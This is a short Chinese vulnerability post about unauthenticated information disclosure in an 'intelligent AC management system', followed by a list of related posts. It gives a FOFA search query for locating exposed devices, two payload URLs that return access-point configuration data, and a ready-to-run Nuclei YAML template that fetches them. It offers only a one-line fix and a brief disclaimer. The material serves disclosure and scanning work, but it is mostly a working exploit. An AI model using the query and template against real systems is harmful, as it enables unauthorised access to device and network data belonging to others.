智能AC管理系统信息泄露漏洞

文章目录

免责声明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

智能AC管理系统是一个控制管理系统因存在未授权访问导致信息泄露

搜索语法

fofa

header="HTTPD_ac 1.0" 

漏洞复现

payload

http://ip/actpt.data

payload

http://ip/actpt_5g.data

yaml

yaml 复制代码
id: intelligent-AC-Manage-system-Information-breaches

info: 
 name: 智能AC管理系统信息泄露漏洞
 author: xl
 description: information breaches
 severity: high

http: 
  - raw: 
      - |+
         GET /actpt.data HTTP/1.1
         Host: {{Hostname}} 
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
  - raw: 
      - |+
         GET /actpt_5g.data HTTP/1.1
         Host: {{Hostname}} 
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36

matchers-condition: and
matchers: 
  - type: word
    part: body
    words: 
      - 'ap_name'
  - type: status
    status:
      - 200

修复建议

更新到最新版本

相关推荐
扣脚大汉在网络3 天前
chatgpt个人版ssrf漏洞
漏洞
网络研究院4 天前
微软九月补丁星期二发现了 79 个漏洞
windows·安全·微软·系统·漏洞·版本·更新
扣脚大汉在网络14 天前
某云彩SRM2.0后台绕过漏洞
漏洞
扣脚大汉在网络14 天前
某云彩SRM2.0任意文件下载漏洞
漏洞
樱浅沐冰23 天前
【vulhub】Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
java·漏洞·weblogic
网安加社区1 个月前
网安新声 | 从微软“狂躁许可”漏洞事件看安全新挑战与应对策略
网络安全·微软·漏洞
网络研究院1 个月前
Grype:用于容器镜像、文件系统的开源漏洞扫描程序
安全·容器·系统·文件·漏洞·镜像·扫描
凝聚力安全团队2 个月前
【漏洞复现】通达OA v2017 video_file.php 任意文件下载漏洞
web安全·web·漏洞·漏洞复现·web渗透
网络研究院2 个月前
Rejetto HFS 服务器存在严重漏洞受到攻击
运维·服务器·安全·黑客·漏洞·警告·hfs